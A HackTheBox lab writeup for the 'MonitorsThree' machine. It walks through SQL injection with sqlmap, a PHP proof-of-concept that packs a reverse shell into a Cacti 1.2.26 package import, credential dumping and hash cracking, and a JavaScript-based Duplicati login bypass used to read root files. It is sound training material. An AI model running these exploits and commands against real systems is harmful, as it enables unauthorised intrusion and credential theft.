MonitorsThree Writeup

Writeup of "MonitorsThree" machine from Hackthebox

Posted Jan 18, 2025 Updated Jan 22, 2025

By riminux

5 min read

MonitorsThree Writeup

MonitorsThree(M)

Initial Foothold

Let’s start with an nmap scan to identify open ports and services: nmap -A -p- -Pn 10.10.11.30 -vv

PORT     STATE    SERVICE REASON         VERSION
22/tcp   open     ssh     syn-ack ttl 63 OpenSSH 8.9p1 Ubuntu 3ubuntu0.10 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey: 
|   256 86:f8:7d:6f:42:91:bb:89:72:91:af:72:f3:01:ff:5b (ECDSA)
| ecdsa-sha2-nistp256 AAAAE2VjZHNhLXNoYTItbmlzdHAyNTYAAAAIbmlzdHAyNTYAAABBBNwl884vMmev5jgPEogyyLoyjEHsq+F9DzOCgtCA4P8TH2TQcymOgliq7Yzf7x1tL+i2mJedm2BGMKOv1NXXfN0=
|   256 50:f9:ed:8e:73:64:9e:aa:f6:08:95:14:f0:a6:0d:57 (ED25519)
|_ssh-ed25519 AAAAC3NzaC1lZDI1NTE5AAAAIN5W5QMRdl0vUKFiq9AiP+TVxKIgpRQNyo25qNs248Pa
80/tcp   open     http    syn-ack ttl 63 nginx 1.18.0 (Ubuntu)
| http-methods: 
|_  Supported Methods: GET HEAD POST OPTIONS
|_http-title: Did not follow redirect to http://monitorsthree.htb/
|_http-server-header: nginx/1.18.0 (Ubuntu)

Added monitorsthree.htb to /etc/hosts and navigated to it:

Using wfuzz, to brute force for potential subdomains: wfuzz -w /usr/share/seclists/Discovery/DNS/subdomains-top1million-110000.txt -u "http://monitorsthree.htb" -H "Host: FUZZ.monitorsthree.htb" --hw 982

This reveals the subdomain cacti.monitorsthree.htb. Adding it to /etc/hosts and visiting it shows a Cacti installation (v1.2.26):

A search for cacti 1.2.26 exploit directs to this CVE Details page, which further references an advisory on GitHub

Exploitation of this vulnerability requires credentials. Default credentials fail, so we return to monitorsthree.htb and discover a login page:

The forgot password request was intercepted and saved using Burp Suite:

Used sqlmap: sqlmap -r req --dump --batch

Then it is seen that username parameter is vulnerable to Blind time-based SQLi and waiting for a while for SQLMAP to do its work I finally get password hashes:

+----------------------------------+
| password                         |
+----------------------------------+
| 1e68b6eb86b45f6d92f8f292428f77ac |
| 31a181c8372e3afc59dab863430610e8 |
+----------------------------------+

The hash was successfully cracked using CrackStation: admin:greencacti2001

Using these credentials on cacti.monitorsthree.htb successfully logs us in.

Again let’s go back to this source

I slightly modified the PoC code to add Pentest monkey’s reverse shell in revshell.php file:

<?php

$shell_file_path = "./php-reverse-shell.php";
$filedata = file_get_contents($shell_file_path);

if ($filedata === false) {
    die("Failed to read the contents of shell.php. Ensure the file exists and is readable.");
}

$xmldata = "<xml>
   <files>
       <file>
           <name>resource/test.php</name>
           <data>%s</data>
           <filesignature>%s</filesignature>
       </file>
   </files>
   <publickey>%s</publickey>
   <signature></signature>
</xml>";

$keypair = openssl_pkey_new(); 
$public_key = openssl_pkey_get_details($keypair)["key"]; 

openssl_sign($filedata, $filesignature, $keypair, OPENSSL_ALGO_SHA256);

$data = sprintf(
    $xmldata,
    base64_encode($filedata),
    base64_encode($filesignature),
    base64_encode($public_key)
);

openssl_sign($data, $signature, $keypair, OPENSSL_ALGO_SHA256);

file_put_contents(
    "test.xml",
    str_replace(
        "<signature></signature>",
        "<signature>" . base64_encode($signature) . "</signature>",
        $data
    )
);

system("cat test.xml | gzip -9 > test.xml.gz; rm test.xml");

?>

php revshell.php

On my attacker machine got my netcat listener ready: nc -lvnp 1234

Within Cacti:

Navigate to Import/Export -> Import Packages
Upload test.xml.gz containing the payload.
Visit http://cacti.monitorsthree.htb/cacti/resource/test.php.

A reverse shell is established as www-data:

Getting User Flag

To enhance shell interaction, a TTY shell was obtained: python3 -c 'import pty; pty.spawn("/bin/bash")'

Examining /var/www/html/cacti/include/config.php reveals MySQL credentials: cactiuser:cactiuser

Using the discovered credentials, a connection to the MySQL database was established:
mysql -h localhost -u cactiuser -p

The following commands were executed to explore the database and extract sensitive information:

SHOW DATABASES;
USE cacti;
SHOW TABLES;
SELECT * FROM user_auth;

The user_auth table contained hashed credentials: marcus:$2y$10$Fq8wGXvlM3Le.5LIzmM9weFs9s6W2i1FLg3yrdNGmkIaxo79IBjtK

The password hash for the marcus user was cracked using Hashcat:
hashcat -m 3200 -a 0 hash /usr/share/wordlists/rockyou.txt Got password: 12345678910

Direct SSH login using Marcus’s password was not possible due to password-based authentication being disabled. However, the su command was used within the www-data shell to switch to the marcus user:

In Marcus’s home directory, the user.txt flag was retrieved, along with the discovery of an SSH private key (id_rsa) located in the ~/.ssh directory:

With the private key saved to a file and permissions adjusted (chmod 600 id_rsa), SSH access was obtained:
ssh marcus@10.10.11.30 -i id_rsa

Privilege Escalation

Running the command ss -ltn revealed a service listening on port 8200:

To investigate further, the port was forwarded to the local machine using SSH:
ssh -L 8200:localhost:8200 marcus@10.10.11.30 -i id_rsa

Accessing http://localhost:8200 displayed the Duplicati login page:

Since the login credentials were unknown, the /opt/duplicati/config directory was examined. This revealed the presence of a file named Duplicati-server.sqlite

The file was transferred to the attacker’s machine for analysis:
On target system: python3 -m http.server 1234
On attacker’s system: wget 10.10.11.30:1234/Duplicati-server.sqlite

The SQLite database was opened: sqlite3 Duplicati-server.sqlite

Listed tables: .tables

Dumped Option table: select * from Option;

4||encryption-module|
4||compression-module|zip
4||dblock-size|50mb
4||--no-encryption|true
-1||--asynchronous-upload-limit|50
-1||--asynchronous-concurrent-upload-limit|50
17||encryption-module|
17||compression-module|zip
17||dblock-size|50mb
17||--no-encryption|true
-2||startup-delay|0s
-2||max-download-speed|
-2||max-upload-speed|
-2||thread-priority|
-2||last-webserver-port|8200
-2||is-first-run|
-2||server-port-changed|True
-2||server-passphrase|Wb6e855L3sN9LTaCuwPXuautswTIQbekmMAr7BrK2Ho=
-2||server-passphrase-salt|xTfykWV1dATpFZvPhClEJLJzYA5A4L74hX7FK8XmY0I=
-2||server-passphrase-trayicon|cfaa19fb-ae3d-4183-9f74-12753f163568
-2||server-passphrase-trayicon-hash|sAdCRys6XeORxNT3xIE7LN3DwiWdkf9h0cY4kC1Y24M=
-2||last-update-check|638720785636621360
-2||update-check-interval|
-2||update-check-latest|
-2||unacked-error|False
-2||unacked-warning|False
-2||server-listen-interface|any
-2||server-ssl-certificate|
-2||has-fixed-invalid-backup-id|True
-2||update-channel|
-2||usage-reporter-level|
-2||has-asked-for-password-protection|true
-2||disable-tray-icon-login|false
-2||allowed-hostnames|*

I see that I get a server passphrase. But using it as a password didn’t work:

A targeted search for a Duplicati authentication bypass exploit led to the discovery of a bypass technique.

Steps to Bypass Authentication:

The salt presented during login matched the database value:
The passphrase was decoded to hexadecimal using cyberchef:
With Burp, the login request was intercepted:

In the browser’s developer console, the following JavaScript was executed:

var noncedpwd = CryptoJS.SHA256(CryptoJS.enc.Hex.parse(CryptoJS.enc.Base64.parse('<URL decoded session-nonce>') + '<hex passphrase from cyberchef>')).toString(CryptoJS.enc.Base64);
noncedpwd

The resulting value was URL-encoded and inserted into the intercepted login request:

Authentication was bypassed successfully:

From the Duplicati interface, the “Commandline …” section was accessed:

A backup operation was configured to target the /root directory: The Backup was initiated by selecting “Run “backup” command now”:

Key backup files were identified for further analysis:
duplicati-bc2d8d70b8eb74c4ea21235385840e608.dblock.zip
duplicati-20250111T123604Z.dlist.zip

These files were downloaded from /opt/backups/cacti directory using Marcus’s session.

Unzipping duplicati-20250111T123604Z.dlist.zip:

cat filelist.json | grep root.txt

We can see /source/root/root.txt hash: feF8CiSNDKE+zs1yYilBfDR4uJggLrgIqE/I+PDOB0M=

The file corresponding to this hash can be located within the archive duplicati-bc2d8d70b8eb74c4ea21235385840e608.dblock.zip. Upon extracting and viewing the file with the matching hash, the root flag will be revealed.

Writeups, Hackthebox

Hackthebox

This post is licensed under CC BY 4.0 by the author.

MonitorsThree(M)

Initial Foothold

Getting User Flag

Privilege Escalation

Trending Tags